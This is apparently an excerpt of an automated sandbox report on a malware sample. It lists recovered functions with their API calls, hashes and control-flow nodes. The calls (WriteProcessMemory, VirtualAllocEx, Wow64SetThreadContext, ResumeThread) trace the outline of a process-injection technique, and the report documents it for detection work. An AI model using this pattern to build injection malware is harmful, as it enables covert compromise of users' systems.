                                                                                  • Snapshot File: hcaresult_9_2_4500000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID: MemoryProcessWrite
                                                                                  • String ID:
                                                                                  • API String ID: 3559483778-0
                                                                                  • Opcode ID: eccb6cb8ea3e848d102d24d89356e9e483d2ea80b29736a16ec1f8771df4de9c
                                                                                  • Instruction ID: ff8e715db2c8b4af7625068786e275f0698d985ffeca66bcc2d8252079de5c47
                                                                                  • Opcode Fuzzy Hash: eccb6cb8ea3e848d102d24d89356e9e483d2ea80b29736a16ec1f8771df4de9c
                                                                                  • Instruction Fuzzy Hash: F12169B59003099FCB10CFAAC981BDEBBF5FF48310F108429E958A7290C778A944DBA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04500D48 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 664 4500d48-4500d9b 667 4500dab-4500ddb Wow64SetThreadContext 664->667 668 4500d9d-4500da9 664->668 670 4500de4-4500e14 667->670 671 4500ddd-4500de3 667->671 668->667 671->670
                                                                                  APIs
                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04500DCE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1722695915.0000000004500000.00000040.00000800.00020000.00000000.sdmp, Offset: 04500000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_4500000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID: ContextThreadWow64
                                                                                  • String ID:
                                                                                  • API String ID: 983334009-0
                                                                                  • Opcode ID: 2ea4c5ca54e43761f3048ae5f83d801554d84eb5ceb8d9ffc9c549ad115bf426
                                                                                  • Instruction ID: aabb278e874911ead56359a475e2f27067e061342ce8ab746736a3b497ba91e3
                                                                                  • Opcode Fuzzy Hash: 2ea4c5ca54e43761f3048ae5f83d801554d84eb5ceb8d9ffc9c549ad115bf426
                                                                                  • Instruction Fuzzy Hash: 0D2128B19002099FDB10DFAAC4857EEBBF4FF88324F14C42AD459A7281D778A945CFA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0231E5D8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 675 231e5d8-231eb3c DuplicateHandle 677 231eb45-231eb62 675->677 678 231eb3e-231eb44 675->678 678->677
                                                                                  APIs
                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0231EA6E,?,?,?,?,?), ref: 0231EB2F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1713905223.0000000002310000.00000040.00000800.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_2310000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID: DuplicateHandle
                                                                                  • String ID:
                                                                                  • API String ID: 3793708945-0
                                                                                  • Opcode ID: e5a0c03191040b61c8103cfe123d497b8c293ae81e62c305d445acf583ef43a4
                                                                                  • Instruction ID: a3d4506c58fcc715fc51812dc015650b480b0b6bfa8d5403df6e9be8546be2f5
                                                                                  • Opcode Fuzzy Hash: e5a0c03191040b61c8103cfe123d497b8c293ae81e62c305d445acf583ef43a4
                                                                                  • Instruction Fuzzy Hash: BF2103B5900208AFDB10CFAAD584ADEFBF8FB48320F14801AE954B7310D375A940CFA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04500FD0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 681 4500fd0-4501065 ReadProcessMemory 685 4501067-450106d 681->685 686 450106e-450109e 681->686 685->686
                                                                                  APIs
                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04501058
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1722695915.0000000004500000.00000040.00000800.00020000.00000000.sdmp, Offset: 04500000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_4500000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID: MemoryProcessRead
                                                                                  • String ID:
                                                                                  • API String ID: 1726664587-0
                                                                                  • Opcode ID: 9e7451902bcba4a41c37f7fd91dfbcbcb0bb490827eeb315732a817c3a5cf6f3
                                                                                  • Instruction ID: 39da1bcc766a74a5e069bdc775a0d33006cb614444b81c0cfa6f4f37d28effed
                                                                                  • Opcode Fuzzy Hash: 9e7451902bcba4a41c37f7fd91dfbcbcb0bb490827eeb315732a817c3a5cf6f3
                                                                                  • Instruction Fuzzy Hash: 182136B1900259DFCB10DFAAC980AEEFBF5FF48320F108429E958A7250C775A944DBA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04500D50 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 690 4500d50-4500d9b 692 4500dab-4500ddb Wow64SetThreadContext 690->692 693 4500d9d-4500da9 690->693 695 4500de4-4500e14 692->695 696 4500ddd-4500de3 692->696 693->692 696->695
                                                                                  APIs
                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04500DCE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1722695915.0000000004500000.00000040.00000800.00020000.00000000.sdmp, Offset: 04500000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_4500000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID: ContextThreadWow64
                                                                                  • String ID:
                                                                                  • API String ID: 983334009-0
                                                                                  • Opcode ID: 93b0696bbc37be4d01bc07300598713c6821e9dc95442858fc859a10d54b1351
                                                                                  • Instruction ID: 603a5177b8f5b96b80b04d64bdf11e346880272747939bad8855a12641f686ef
                                                                                  • Opcode Fuzzy Hash: 93b0696bbc37be4d01bc07300598713c6821e9dc95442858fc859a10d54b1351
                                                                                  • Instruction Fuzzy Hash: A92118B59002099FDB10DFAAC4857EEBBF4FF88324F14C42AD459A7281C778A945CFA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04500FD8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 700 4500fd8-4501065 ReadProcessMemory 703 4501067-450106d 700->703 704 450106e-450109e 700->704 703->704
                                                                                  APIs
                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04501058
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1722695915.0000000004500000.00000040.00000800.00020000.00000000.sdmp, Offset: 04500000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_4500000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID: MemoryProcessRead
                                                                                  • String ID:
                                                                                  • API String ID: 1726664587-0
                                                                                  • Opcode ID: 596eedaf3cd3e26fdb1cc838e8248f02b14335b3d5785b9ed2441c8422f2cbfa
                                                                                  • Instruction ID: 7ed84444af524e973d1ca82501a7be2d2340d908c5f232d5497ee20643861d57
                                                                                  • Opcode Fuzzy Hash: 596eedaf3cd3e26fdb1cc838e8248f02b14335b3d5785b9ed2441c8422f2cbfa
                                                                                  • Instruction Fuzzy Hash: 2C2128B19003599FCB10DFAAC841ADEFBF5FF48320F108429E558A7250C775A544DBA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04500E20 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04500E96
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1722695915.0000000004500000.00000040.00000800.00020000.00000000.sdmp, Offset: 04500000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_4500000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 4275171209-0
                                                                                  • Opcode ID: 8c87cd66b09ab8b61569207754751613045f34f498d6d44130c66d44ab4f0c2c
                                                                                  • Instruction ID: 57c079c6adc733fe44327b5587ddb4ec417cee41b1a425ad1f10b067dc88766a
                                                                                  • Opcode Fuzzy Hash: 8c87cd66b09ab8b61569207754751613045f34f498d6d44130c66d44ab4f0c2c
                                                                                  • Instruction Fuzzy Hash: 4D1144B28002488FCB10DFAAD845BDFBFF5EB88320F208419E559A7250C735A544DBA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0231C280 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0231C8A1,00000800,00000000,00000000), ref: 0231CAB2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1713905223.0000000002310000.00000040.00000800.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_2310000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1029625771-0
                                                                                  • Opcode ID: 08af778c14c5112bccc26e78e9dd38e2ff85194752480000c37fc084a4c0a0ae
                                                                                  • Instruction ID: 5822ebc75d2b3cdff531b77148b7dd6c4c3f3f9c9010602c038841936008bb53
                                                                                  • Opcode Fuzzy Hash: 08af778c14c5112bccc26e78e9dd38e2ff85194752480000c37fc084a4c0a0ae
                                                                                  • Instruction Fuzzy Hash: A01112B6D003499FDB14CF9AC544ADEFBF8EB88324F14842AE419A7250C375A945CFA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04500C98 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1722695915.0000000004500000.00000040.00000800.00020000.00000000.sdmp, Offset: 04500000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_4500000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID: ResumeThread
                                                                                  • String ID:
                                                                                  • API String ID: 947044025-0
                                                                                  • Opcode ID: a78282d056ef30cd3025713454bf8efa0c9284e465d89497db9dd702f1b791d7
                                                                                  • Instruction ID: 17fe526a1a415c25f246e2553ef7571b99ddb4f9eaf3ed6074d37f98a3062409
                                                                                  • Opcode Fuzzy Hash: a78282d056ef30cd3025713454bf8efa0c9284e465d89497db9dd702f1b791d7
                                                                                  • Instruction Fuzzy Hash: CE1158B1D002499FCB10DFAAD4457DFFBF4EF88324F248419D459A7240CB74A945CBA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04500E28 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04500E96
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1722695915.0000000004500000.00000040.00000800.00020000.00000000.sdmp, Offset: 04500000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_4500000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 4275171209-0
                                                                                  • Opcode ID: fd8f588851a4dd32c6aece3ba8cef5a5812a37068786e39ff6037483493f63a0
                                                                                  • Instruction ID: 89874b2ef5068d0a82d6d392c67d5751937d4db159bbd9fffe5a0e7cca3fc25b
                                                                                  • Opcode Fuzzy Hash: fd8f588851a4dd32c6aece3ba8cef5a5812a37068786e39ff6037483493f63a0
                                                                                  • Instruction Fuzzy Hash: 5E1156728002488FCB10DFAAC844BDFBFF5EF88320F208419E559A7250C735A544CFA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04500CA0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1722695915.0000000004500000.00000040.00000800.00020000.00000000.sdmp, Offset: 04500000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_4500000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID: ResumeThread
                                                                                  • String ID:
                                                                                  • API String ID: 947044025-0
                                                                                  • Opcode ID: 73282ff24f39356a07c9d78891aace20010197858bbda405de77acd10141dbd8
                                                                                  • Instruction ID: 1ea1fadd7095c2b4968bd9e53739ca1161749fcbc152000b0d751894e4f1f99f
                                                                                  • Opcode Fuzzy Hash: 73282ff24f39356a07c9d78891aace20010197858bbda405de77acd10141dbd8
                                                                                  • Instruction Fuzzy Hash: 3A1155B19002488BCB20DFAAD4457DFFBF4AF88324F208429C459A7240CB34A944CBA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04504B78 Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 04504BDD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1722695915.0000000004500000.00000040.00000800.00020000.00000000.sdmp, Offset: 04500000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_4500000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessagePost
                                                                                  • String ID:
                                                                                  • API String ID: 410705778-0
                                                                                  • Opcode ID: ecd87ffbb2a8c5fbb2518f5602d1735bcb183b0eb15867954ca3714f68cedebb
                                                                                  • Instruction ID: bec2084c6b6920a039d69e366e56dad54e4b9e9c42c3ac18f2b48a9532b6d9b9
                                                                                  • Opcode Fuzzy Hash: ecd87ffbb2a8c5fbb2518f5602d1735bcb183b0eb15867954ca3714f68cedebb
                                                                                  • Instruction Fuzzy Hash: 711106B58006499FDB10DF9AD889BDEFBF4FB48324F10845AD958A7250C375A984CFA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0231C7C0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0231C826
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1713905223.0000000002310000.00000040.00000800.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_2310000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleModule
                                                                                  • String ID:
                                                                                  • API String ID: 4139908857-0
                                                                                  • Opcode ID: cbc96fa442f18d0ffa5b3190dc3f6825171a455563826a4ac16d32e67921b4d3
                                                                                  • Instruction ID: 7134bafcacc499c618d7094b9732de934386a63f7800431a9b6752661469f605
                                                                                  • Opcode Fuzzy Hash: cbc96fa442f18d0ffa5b3190dc3f6825171a455563826a4ac16d32e67921b4d3
                                                                                  • Instruction Fuzzy Hash: D211DFB6D002498FCB14DF9AD544ADEFBF4EB88324F10846AD459B7210C375A545CFA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04502D70 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 04504BDD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1722695915.0000000004500000.00000040.00000800.00020000.00000000.sdmp, Offset: 04500000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_4500000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessagePost
                                                                                  • String ID:
                                                                                  • API String ID: 410705778-0
                                                                                  • Opcode ID: 778e7acd6470465aa70783e59caed8aff47f4d33ec9fb807ec420ddc9b4fc448
                                                                                  • Instruction ID: 8365b1931b35560fea962c523d34fce66883a929ebfb6ed1ec5ac54a15620548
                                                                                  • Opcode Fuzzy Hash: 778e7acd6470465aa70783e59caed8aff47f4d33ec9fb807ec420ddc9b4fc448
                                                                                  • Instruction Fuzzy Hash: C61122B58003489FDB10DF9AD845BDEBBF8FB48320F108459E958A7240C374A944CFA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 068738E4 Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1725638344.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_6870000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Te^q
                                                                                  • API String ID: 0-671973202
                                                                                  • Opcode ID: 60a5851a7bf04bcb4f38f75450e01bba9e999fa169d9c4022f991826247549ad
                                                                                  • Instruction ID: a4aafa68c1f33a5c569c9f485e471d361249b657b5278eb3d61fa537575b6616
                                                                                  • Opcode Fuzzy Hash: 60a5851a7bf04bcb4f38f75450e01bba9e999fa169d9c4022f991826247549ad
                                                                                  • Instruction Fuzzy Hash: DA51A131B006068FCB14DB79D8889BEBBF6EFC8214B14892AE469D7351DF34DD058791
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 06871596 Relevance: 1.3, Strings: 1, Instructions: 80COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1725638344.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_6870000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: l.^q
                                                                                  • API String ID: 0-1633537341
                                                                                  • Opcode ID: 2b803c52c2692670f37c2394e8310e856bd9b5cb5db8ddd1040dcbba6a8d6dff
                                                                                  • Instruction ID: b24d588d57bcb1439202521423bcb633d3fd9d958fe59bfefc7a52561b95ecba
                                                                                  • Opcode Fuzzy Hash: 2b803c52c2692670f37c2394e8310e856bd9b5cb5db8ddd1040dcbba6a8d6dff
                                                                                  • Instruction Fuzzy Hash: BD21D6B6E0412DCFCB608F58A8095BEB7A5BB85611F1C4626EB95D7A40D231CB14C7D0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0687ABC0 Relevance: 1.3, Strings: 1, Instructions: 76COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1725638344.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_6870000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Te^q
                                                                                  • API String ID: 0-671973202
                                                                                  • Opcode ID: 1c950aa083693d0bbbeff405a3ead46a14e94e8dbaf011de543cc7db16685a68
                                                                                  • Instruction ID: 68c2da5fdd2e47964eba2e0aa1c63b3d44029abf3d68c1961310cba682f88aeb
                                                                                  • Opcode Fuzzy Hash: 1c950aa083693d0bbbeff405a3ead46a14e94e8dbaf011de543cc7db16685a68
                                                                                  • Instruction Fuzzy Hash: 5331F6B0E0124C9FDB48DFAAD9456AEFBF6AF88305F10902AD819AB354DB345905CF80
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 06874ED0 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1725638344.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_6870000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Te^q
                                                                                  • API String ID: 0-671973202
                                                                                  • Opcode ID: a9ba4973323545e60607c3baaeeb855c1f4d97431f120781ebcbdbd4f486ce23
                                                                                  • Instruction ID: 8ce431d61eba1efb1e0e1f8ccf602031264a52dcbdb06783544c405446c2fcd1
                                                                                  • Opcode Fuzzy Hash: a9ba4973323545e60607c3baaeeb855c1f4d97431f120781ebcbdbd4f486ce23
                                                                                  • Instruction Fuzzy Hash: 09115E31F4020A8FCB54EBB999405EEB6FAAB88214B10002AC509EB344EB31CE06CB91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 06870283 Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1725638344.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_6870000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: fcq
                                                                                  • API String ID: 0-2768158334
                                                                                  • Opcode ID: f4e97207574480b3f97312869960a355d702ecc43cacbe7ae7f5fe38244c21f1
                                                                                  • Instruction ID: 3ad5be5081b04ec381eedec0dc03deeb0725f0f8c35f4cb50a638759e54fe7ac
                                                                                  • Opcode Fuzzy Hash: f4e97207574480b3f97312869960a355d702ecc43cacbe7ae7f5fe38244c21f1
                                                                                  • Instruction Fuzzy Hash: 41F08CB1A442188FDB009B91D819B6E7FA2BF51351F498092F449DF2D3DB68DD81C790
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0687ADF0 Relevance: .3, Instructions: 263COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1725638344.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_6870000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6846a20609b50ef65eb47ba85c48b7155dcb661bd5bb2eaf2e530bfdf962b857
                                                                                  • Instruction ID: fe779bda461e346f97856d6a1ad10a1a1f85d1d4114b4f437e3c4c4346d75361
                                                                                  • Opcode Fuzzy Hash: 6846a20609b50ef65eb47ba85c48b7155dcb661bd5bb2eaf2e530bfdf962b857
                                                                                  • Instruction Fuzzy Hash: 1EB12C70E1121DCFDB44DFA8D981AEDBBB6FF88304F109625E419AB355DB30A985CB80
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 068772D0 Relevance: .2, Instructions: 186COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1725638344.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_6870000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: dd222ad61d1a5f84dd4c0a6319bd924b81185bfede066bcd252f484a5d0e78f4
                                                                                  • Instruction ID: f8564557bc8ad3cecf9125195d24c86ad2721ae60bcdb199e2171a1c3fdd7b32
                                                                                  • Opcode Fuzzy Hash: dd222ad61d1a5f84dd4c0a6319bd924b81185bfede066bcd252f484a5d0e78f4
                                                                                  • Instruction Fuzzy Hash: 5561C434F042489FE744DBA9D841B7EBAB2FB89704F10856AF561DB385DB34D842CB91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 068772C0 Relevance: .2, Instructions: 176COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1725638344.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_6870000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 007ea0f24f7c2bc0eefbfa3f88421f8e7bbc304d18bf69f1dde6b557fc310643
                                                                                  • Instruction ID: d2633683ac00d933e21d7988809502ade4d2eb5cfcca2ae9f0bb826f30fc552f
                                                                                  • Opcode Fuzzy Hash: 007ea0f24f7c2bc0eefbfa3f88421f8e7bbc304d18bf69f1dde6b557fc310643
                                                                                  • Instruction Fuzzy Hash: 8C51D474F042089FE744DBA9D841B7EBAB3FB88714F10816AE561EB385DB34D842CB91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 068718A8 Relevance: .1, Instructions: 139COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1725638344.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_6870000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 61ef9f7e38342d2bddc81cc7b00da8fd045315ffad0705df8f7028453a4fb7a9
                                                                                  • Instruction ID: 0f3d948c5e25606fe6f72ae287478f463855e7930fc6961198c5b4258fa21b6d
                                                                                  • Opcode Fuzzy Hash: 61ef9f7e38342d2bddc81cc7b00da8fd045315ffad0705df8f7028453a4fb7a9
                                                                                  • Instruction Fuzzy Hash: F251F371D182598FC780CB69C8486AEFBF1AF52304F5C806BD1E5EBA92D334D906CB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 06871734 Relevance: .1, Instructions: 137COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1725638344.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_6870000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a1de0f6fa0d3dc1b9dd6c13e596d470c54a1656ad75993a17bc2156d231dc91a
                                                                                  • Instruction ID: 8e3d2cd0301cd829499870ed1de3aed74fadc93cc6c9ce1a549ada5c5ccbf840
                                                                                  • Opcode Fuzzy Hash: a1de0f6fa0d3dc1b9dd6c13e596d470c54a1656ad75993a17bc2156d231dc91a
                                                                                  • Instruction Fuzzy Hash: 0251DE31E04519CFDB90CF68C8492BEB7B1FB45295F0C8226E6EAD7A90D334DA40CB91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 06871F20 Relevance: .1, Instructions: 126COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1725638344.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_6870000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f5433fb708783eb3a4e4f3ad15bbde203596046efd29f7fa75659f07f1a88fa9
                                                                                  • Instruction ID: ea11c8521af6c38e85624448b505a1bd705d61bd9d181d0e517d8c58728aaad9
                                                                                  • Opcode Fuzzy Hash: f5433fb708783eb3a4e4f3ad15bbde203596046efd29f7fa75659f07f1a88fa9
                                                                                  • Instruction Fuzzy Hash: 3D41A174909685DFC306CF6AE594958BFF1EF8A200B2A80D6D484DB6B3DB349E16C712
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 06874570 Relevance: .1, Instructions: 120COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1725638344.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_6870000_pUAQmWA.jbxd
